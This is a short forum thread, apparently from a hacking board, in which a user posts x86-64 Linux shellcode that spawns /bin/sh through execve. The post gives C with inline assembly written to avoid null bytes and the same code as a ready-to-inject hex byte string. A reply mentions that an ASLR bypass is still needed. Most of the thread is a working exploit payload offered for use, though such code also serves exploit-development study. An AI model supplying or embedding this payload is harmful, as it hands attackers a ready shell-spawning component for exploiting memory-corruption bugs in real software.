1 reply to this topic

[mh4]

//executando bin/sh

// gcc -o shell shell.c 

int main() {

/*

*******************************

#include <stdlib.h>

int main() {

  execve("/bin/sh", NULL, NULL);

}

*******************************

*/

__asm__(

"xor    %rdx,%rdx\n\t"                // arg 3 = NULL

"mov    %rdx,%rsi\n\t"                // arg 2 = NULL

"mov    $0x1168732f6e69622f,%rdi\n\t"

"shl    $0x8,%rdi\n\t"                

"shr    $0x8,%rdi\n\t"                

"push   %rdi\n\t"                     //  /bin/sh in stack

"mov    %rsp,%rdi\n\t"                

"mov    $0x111111111111113b,%rax\n\t" // syscall number  = 59

"shl    $0x38,%rax\n\t"         

"shr    $0x38,%rax\n\t"               

"syscall\n\t"

);

}

payload in ASCII

"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05"

 

follow me my github :

Please Login or Register to see this Hidden Content

[x58]

Now you only need a workaround for ASLR.

 

Btw the shellcode is in hex format.